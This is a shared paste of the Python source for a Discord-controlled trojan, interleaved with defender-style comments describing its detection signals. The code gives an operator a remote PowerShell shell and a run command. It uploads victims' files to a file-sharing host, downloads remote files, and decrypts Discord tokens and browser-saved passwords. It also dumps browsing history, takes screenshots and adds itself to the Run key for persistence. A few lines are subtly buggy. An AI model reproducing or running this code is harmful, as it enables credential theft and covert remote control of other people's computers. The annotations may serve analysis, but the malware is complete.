FlyFar

Python-Trojan | Source Code

Jun 28th, 2023
Python 12.39 KB | Cybersecurity | 0 0
  1. '''
  2. for more information, visit https://github.com/Jeff53978/Python-Trojan
  3. '''
  4. import os, discord, subprocess, requests, re, json, win32crypt, base64, shutil, sqlite3, winreg
  5. from Crypto.Cipher import AES
  6. from PIL import ImageGrab
  7. from datetime import datetime
  8.  
  9. APPDATA = os.getenv("APPDATA")
      # APPDATA, LOCALAPPDATA and TEMP are read from the per-user environment.
      # The handlers further down search the first two for application data and
      # write their working files (list.txt, output.txt, screenshot.png,
      # history.txt, passwords.txt and <random hex>.db copies) under TEMP, which
      # makes %TEMP% the first place to look for artifacts on an affected host.
  10. LOCALAPPDATA = os.getenv("LOCALAPPDATA")
  11. TEMP = os.getenv("TEMP")
  12.  
      # Discord guild id and bot token used by on_ready and bot.run. Both are
      # empty strings in this paste. NOTE(review): a recovered sample would
      # presumably carry real values here; treat them as indicators to extract
      # and report, not as something to reuse.
  13. guild_id = ""
  14. token = ""
  15.  
  16. def get_processor():
          # Host profiling helper called from on_ready. It starts powershell.exe
          # through subprocess (shell=True) with a Get-WmiObject Win32_Processor
          # pipeline, decodes the captured stdout and returns the element at
          # index 3 of the newline split.
          # Defender note: each call is a powershell.exe process created by the
          # Python interpreter; command-line process-creation logging records
          # the Get-WmiObject query text.
  17.     stdout = subprocess.Popen(
  18.         ["powershell.exe", "Get-WmiObject -Class Win32_Processor -ComputerName. | Select-Object -Property Name"], stdout=subprocess.PIPE, shell=True
  19.     ).stdout.read().decode()
  20.     return stdout.split("\n")[3]
  21.  
  22. def get_gpu():
          # Host profiling helper called from on_ready. Same shape as
          # get_processor, but the PowerShell pipeline queries
          # Win32_VideoController; the return value is the element at index 3 of
          # the newline-split stdout.
          # Defender note: a Python process spawning powershell.exe with a WMI
          # inventory query is visible in process-creation telemetry.
  23.     stdout = subprocess.Popen(
  24.         ["powershell.exe", "Get-WmiObject -Class Win32_VideoController -ComputerName. | Select-Object -Property Name"], stdout=subprocess.PIPE, shell=True
  25.     ).stdout.read().decode()
  26.     return stdout.split("\n")[3]
  27.  
  28. def get_os():
          # Host profiling helper called from on_ready. The PowerShell pipeline
          # queries Win32_OperatingSystem and selects Caption; the return value
          # is the element at index 3 of the newline-split stdout.
          # Defender note: together with get_processor and get_gpu this gives
          # three powershell.exe launches in quick succession at start-up, a
          # pattern that stands out in process-creation logs.
  29.     stdout = subprocess.Popen(
  30.         ["powershell.exe", "Get-WmiObject -Class Win32_OperatingSystem -ComputerName. | Select-Object -Property Caption"], stdout=subprocess.PIPE, shell=True
  31.     ).stdout.read().decode()
  32.     return stdout.split("\n")[3]
  33.  
  34. intents = discord.Intents.all()
      # Module-level client setup. The client requests every gateway intent.
      # session_id is 8 random bytes rendered as 16 hex characters, generated
      # once per process start; on_ready uses it as the name of the channel it
      # creates and on_message uses it to decide which channel's messages are
      # treated as commands.
  35. bot = discord.Client(intents=intents)
  36. session_id = os.urandom(8).hex()
      # Help text sent to the operator. For triage it doubles as a summary of
      # the command names this sample's on_message handler checks for.
  37. commands = "\n".join([
  38.     "help - Help command",
  39.     "ping - Ping command",
  40.     "cwd - Get current working directory",
  41.     "cd - Change directory",
  42.     "ls - List directory",
  43.     "download <file> - Download file",
  44.     "upload <link> - Upload file",
  45.     "shell - Execute shell command",
  46.     "run <file> - Run an file",
  47.     "exit - Exit the session",
  48.     "screenshot - Take a screenshot",
  49.     "tokens - Get all discord tokens",
  50.     "passwords - Extracts all browser passwords",
  51.     "history - Extracts all browser history",
  52.     "startup <name> - Add to startup",
  53. ])
  54.  
  55. @bot.event
  56. async def on_ready():
          # Check-in routine run when the Discord client reports ready. It looks
          # up the guild from guild_id, creates a text channel named after
          # session_id, requests https://api.ipify.org for the public IP, and
          # sends one embed containing the session id, os.getlogin(), the IP,
          # the OS/CPU/GPU strings and the command list.
          # Defender note: the network sequence is an HTTPS request to
          # api.ipify.org followed by Discord API traffic, both from a Python
          # process rather than a browser or the Discord client.
  57.     guild = bot.get_guild(int(guild_id))
  58.     channel = await guild.create_text_channel(session_id)
  59.     ip_address = requests.get("https://api.ipify.org").text
  60.     embed = discord.Embed(title="New session created", description="", color=0xfafafa)
  61.     embed.add_field(name="Session ID", value=f"```{session_id}```", inline=True)
  62.     embed.add_field(name="Username", value=f"```{os.getlogin()}```", inline=True)
  63.     embed.add_field(name="🛰️  Network Information", value=f"```IP: {ip_address}```", inline=False)
  64.     sys_info = "\n".join([
  65.         f"OS: {get_os()}",
  66.         f"CPU: {get_processor()}",
  67.         f"GPU: {get_gpu()}"
  68.     ])
  69.     embed.add_field(name="🖥️  System Information", value=f"```{sys_info}```", inline=False)
  70.     embed.add_field(name="🤖  Commands", value=f"```{commands}```", inline=False)
  71.     await channel.send(embed=embed)
  72.  
  73. @bot.event
  74. async def on_message(message):
          # Command dispatcher. A message is processed when it is not from the
          # bot itself and its channel name equals session_id; the text is then
          # compared against the command strings below. Nothing else about the
          # author is checked, so any account able to post in that channel is
          # treated as the operator.
  75.     if message.author == bot.user:
  76.         return
  77.  
  78.     if message.channel.name != session_id:
  79.         return
  80.  
  81.     if message.content == "help":
  82.         embed = discord.Embed(title="Help", description=f"```{commands}```", color=0xfafafa)
  83.         await message.reply(embed=embed)
  84.  
  85.     if message.content == "ping":
  86.         embed = discord.Embed(title="Ping", description=f"```{round(bot.latency * 1000)}ms```", color=0xfafafa)
  87.         await message.reply(embed=embed)
  88.  
  89.     if message.content.startswith("cd"):
  90.         directory = message.content[3:]
  91.         try:
  92.             os.chdir(directory)
  93.             embed = discord.Embed(title="Changed Directory", description=f"```{os.getcwd()}```", color=0xfafafa)
  94.         except:
  95.             embed = discord.Embed(title="Error", description=f"```Directory not found```", color=0xfafafa)
  96.         await message.reply(embed=embed)
  97.  
  98.     if message.content == "ls":
  99.         files = "\n".join(os.listdir())
  100.         if files == "":
  101.             files = "No files found"
  102.         if len(files) > 4093:
  103.             open(f"{TEMP}\\list.txt", "w").write(files)
  104.             embed = discord.Embed(title=f"Files > {os.getcwd()}", description="```See attachment```", color=0xfafafa)
  105.             file = discord.File(f"{TEMP}\\list.txt")
  106.             return await message.reply(embed=embed, file=file)
  107.         embed = discord.Embed(title=f"Files > {os.getcwd()}", description=f"```{files}```", color=0xfafafa)
  108.         await message.reply(embed=embed)
  109.  
           # Defender note: "download" posts the named local file to
           # api.anonfiles.com and replies with the link from the JSON response,
           # so file content leaves the host toward a file-sharing service
           # rather than through Discord itself. An outbound multipart POST to
           # that host from a Python process is a network indicator.
  110.     if message.content.startswith("download"):
  111.         file = message.content[9:]
  112.         try:
  113.             link = requests.post("https://api.anonfiles.com/upload", files={"file": open(file, "rb")}).json()["data"]["file"]["url"]["full"]
  114.             embed = discord.Embed(title="Download", description=f"```{link}```", color=0xfafafa)
  115.             await message.reply(embed=embed)
  116.         except:
  117.             embed = discord.Embed(title="Error", description=f"```File not found```", color=0xfafafa)
  118.             await message.reply(embed=embed)
  119.  
           # Defender note: "upload" fetches a URL taken from the message and
           # writes the response body into the current working directory under
           # the URL's basename. Neither the URL nor the resulting file name is
           # checked, so new files appearing next to wherever the process was
           # last cd'd are worth collecting during response.
  120.     if message.content.startswith("upload"):
  121.         link = message.content[7:]
  122.         file = requests.get(link).content
  123.         with open(os.path.basename(link), "wb") as f:
  124.             f.write(file)
  125.         embed = discord.Embed(title="Upload", description=f"```{os.path.basename(link)}```", color=0xfafafa)
  126.         await message.reply(embed=embed)
  127.  
           # Defender note: "shell" passes the rest of the message to
           # powershell.exe through subprocess with shell=True, i.e. arbitrary
           # command execution with the privileges of this process. The
           # resulting powershell.exe child of the Python interpreter, and its
           # command line, appear in process-creation and PowerShell logging.
  128.     if message.content.startswith("shell"):
  129.         command = message.content[6:]
  130.         output = subprocess.Popen(
  131.             ["powershell.exe", command], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True
  132.         ).communicate()[0].decode("utf-8")
  133.         if output == "":
  134.             output = "No output"
  135.         if output > 4093:
  136.             open(f"{TEMP}\\output.txt", "w").write(output)
  137.             embed = discord.Embed(title=f"Shell > {os.getcwd()}", description="```See attachment```", color=0xfafafa)
  138.             file = discord.File(f"{os.getenv('TEMP')}\\output.txt")
  139.             return await message.reply(embed=embed, file=file)
  140.         embed = discord.Embed(title=f"Shell > {os.getcwd()}", description=f"```{output}```", color=0xfafafa)
  141.         await message.reply(embed=embed)
  142.  
           # "run" starts the named file through the shell and does not wait
           # for it; the child process outlives this handler call.
  143.     if message.content.startswith("run"):
  144.         file = message.content[4:]
  145.         subprocess.Popen(file, shell=True)
  146.         embed = discord.Embed(title="Started", description=f"```{file}```", color=0xfafafa)
  147.         await message.reply(embed=embed)
  148.  
           # "exit" deletes the session channel before closing the client, so
           # the command history is removed on the Discord side.
  149.     if message.content == "exit":
  150.         await message.channel.delete()
  151.         await bot.close()
  152.  
           # "screenshot" grabs all screens and saves the image to
           # %TEMP%\screenshot.png before attaching it; nothing in this
           # function removes the file afterwards.
  153.     if message.content == "screenshot":
  154.         screenshot = ImageGrab.grab(all_screens=True)
  155.         path = os.path.join(TEMP, "screenshot.png")
  156.         screenshot.save(path)
  157.         file = discord.File(path)
  158.         embed = discord.Embed(title="Screenshot", color=0xfafafa)
  159.         embed.set_image(url="attachment://screenshot.png")
  160.         await message.reply(embed=embed, file=file)
  161.            
  162.     if message.content == "cwd":
  163.         embed = discord.Embed(title="Current Directory", description=f"```{os.getcwd()}```", color=0xfafafa)
  164.         await message.reply(embed=embed)
  165.        
           # Defender note: the "tokens" branch reads the Discord client's
           # "Local State" under %APPDATA%\discord, unwraps
           # os_crypt.encrypted_key with CryptUnprotectData (DPAPI, current
           # user), and scans the .log/.ldb files in "Local Storage\leveldb".
           # Reads of those files, or DPAPI unprotect calls on that key, by any
           # process other than the Discord client are a detection signal.
  166.     if message.content == "tokens":
  167.         tokens = []
  168.         path = f"{APPDATA}\\discord"
  169.         if not os.path.exists(path):
  170.             return ["Discord not installed"]
  171.         local_state = open(f"{path}\\Local State", "r")
  172.         encrypted_master_key = base64.b64decode(json.loads(local_state.read())["os_crypt"]["encrypted_key"])
  173.         master_key = win32crypt.CryptUnprotectData(encrypted_master_key[5:], None, None, None, 0)[1]
  174.         for file_name in os.listdir(f"{path}\\Local Storage\\leveldb"):
  175.             if file_name[-3:] not in ["log", "ldb"]:
  176.                 continue
  177.             for line in [x.strip() for x in open(f'{path}\\Local Storage\\leveldb\\{file_name}', errors='ignore').readlines() if x.strip()]:
  178.                 for y in re.findall(r"dQw4w9WgXcQ:[^\"]*", line):
  179.                     encrypted_token = base64.b64decode(y.split('dQw4w9WgXcQ:')[1])
  180.                     token = AES.new(master_key, AES.MODE_GCM, encrypted_token[3:15]).decrypt(encrypted_token[15:])[:-16].decode()
  181.                     token = token.replace(".", " ")
  182.                     tokens.append(token)
  183.         embed = discord.Embed(title="Tokens", description=f"```{tokens}```", color=0xfafafa)
  184.         await message.reply(embed=embed)
  185.                            
           # Defender note: the "history" branch walks %APPDATA% and
           # %LOCALAPPDATA% for any file named "History", copies each one to
           # %TEMP%\<32 hex characters>.db and queries the urls table of the
           # copy with sqlite3. Nothing in this function deletes the .db copies
           # or %TEMP%\history.txt, so they remain as forensic artifacts; a
           # recursive walk of both profile trees is also noisy in file-access
           # telemetry.
  186.     if message.content == "history":
  187.         paths = []
  188.         file = open(f"{TEMP}\\history.txt", "w")
  189.         for file, folder, files in os.walk(APPDATA):
  190.             if "History" in files:
  191.                 paths.append(file)
  192.         for file, folder, files in os.walk(LOCALAPPDATA):
  193.             if "History" in files:
  194.                 paths.append(file)
  195.         for path in paths:
  196.             if "History" not in os.listdir(path):
  197.                 return
  198.             r_id = os.urandom(16).hex()
  199.             shutil.copy (f"{path}\\History", f"{TEMP}\\{r_id}.db")
  200.             connection = sqlite3.connect(f"{TEMP}\\{r_id}.db")
  201.             cursor = connection.cursor()
  202.             cursor.execute("SELECT url, title, last_visit_time FROM urls")
  203.             for col in cursor.fetchall():
  204.                 url = col[0]
  205.                 title = col[1]
  206.                 last_visit_time = col[2]
  207.                 f.write(f"{url} - {title} - {datetime.fromtimestamp(last_visit_time/1000000-11644473600).strftime('%Y-%m-%d %H:%M:%S')}\n")
  208.             connection.close()
  209.         file.close()
  210.         embed = discord.Embed(title="History", description="```See attachment```", color=0xfafafa)
  211.         file = discord.File(f"{TEMP}\\history.txt")
  212.         await message.reply(embed=embed, file=file)
  213.        
           # Defender note: the "passwords" branch has the same shape as
           # "history" but targets files named "Login Data". For each hit it
           # opens a "Local State" file next to or one level above it, unwraps
           # os_crypt.encrypted_key with CryptUnprotectData, copies "Login Data"
           # to %TEMP%\<32 hex characters>.db and reads the logins table, trying
           # AES-GCM first and CryptUnprotectData on the raw value second.
           # Access to browser "Login Data" / "Local State" files by a
           # non-browser process, and the .db copies plus passwords.txt left in
           # %TEMP%, are the signals to alert on and to collect.
  214.     if message.content == "passwords":
  215.         paths = []
  216.         file = open(f"{TEMP}\\passwords.txt", "w")
  217.         for file, folder, files in os.walk(APPDATA):
  218.             if "Login Data" in files:
  219.                 paths.append(file)
  220.                
  221.         for file, folder, files in os.walk(LOCALAPPDATA):
  222.             if "Login Data" in files:
  223.                 paths.append(file)
  224.         for path in paths:
  225.             if "Login Data" not in os.listdir(path):
  226.                 return
  227.             r_id = os.urandom(16).hex()
  228.             try:
  229.                 local_state = open(f"{path}\\Local State", "r")
  230.             except:
  231.                 try: local_state = open(f"{path}\\..\\Local State", "r")
  232.                 except: return
  233.             encrypted_master_key = base64.b64decode(json.loads(local_state.read())["os_crypt"]["encrypted_key"])
  234.             master_key = win32crypt.CryptUnprotectData(encrypted_master_key[5:], None, None, None, 0)[1]
  235.             shutil.copy (f"{path}\\Login Data", f"{TEMP}\\{r_id}.db")
  236.             connection = sqlite3.connect(f"{TEMP}\\{r_id}.db")
  237.             cursor = connection.cursor()
  238.             cursor.execute("SELECT action_url, username_value, password_value FROM logins")
  239.             for col in cursor.fetchall():
  240.                 url = col[0]
  241.                 username = col[1]
  242.                 try:
  243.                     password = AES.new(master_key, AES.MODE_GCM, col[2][3:15]).decrypt(col[2][15:])[:-16].decode()
  244.                 except:
  245.                     try:
  246.                         password = win32crypt.CryptUnprotectData(col[2], None, None, None, 0)[1].decode()
  247.                     except:
  248.                         password = "Decryption failed"
  249.                 if password == "":
  250.                     password = "Decryption failed"
  251.  
  252.                 file.write(f"{url} - {username} - {password}\n")
  253.             connection.close()
  254.         file.close()
  255.         embed = discord.Embed(title="Passwords", description="```See attachment```", color=0xfafafa)
  256.         file = discord.File(f"{TEMP}\\passwords.txt")
  257.         await message.reply(embed=embed, file=file)
  258.        
           # Defender note: the body of the "startup" branch sets a REG_SZ value
           # under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The value
           # name comes from the message and the data is this script's real
           # path, so the name is not a stable indicator; audit writes to the
           # per-user Run key and review values whose data points at a script
           # or an unexpected interpreter path.
  259.     if message.startswith("startup"):
  260.         name = message.content[8:]
  261.         if not name:
  262.             embed = discord.Embed(title="Error", description="```No name provided```", color=0xfafafa)
  263.             await message.reply(embed=embed)
  264.         else:
  265.             winreg.CreateKey(winreg.HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run")
  266.             registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, winreg.KEY_WRITE)
  267.             winreg.SetValueEx(registry_key, name, 0, winreg.REG_SZ, os.path.realpath(__file__))
  268.             winreg.CloseKey(registry_key)
  269.             embed = discord.Embed(title="Startup", description=f"```Added to startup as {name}```", color=0xfafafa)
  270.             await message.reply(embed=embed)
  271.  
  272. bot.run(token)
       # Entry point: starts the Discord client with the module-level token,
       # which is an empty string in this paste. All command-and-control
       # traffic of this sample goes through the Discord API from this call on.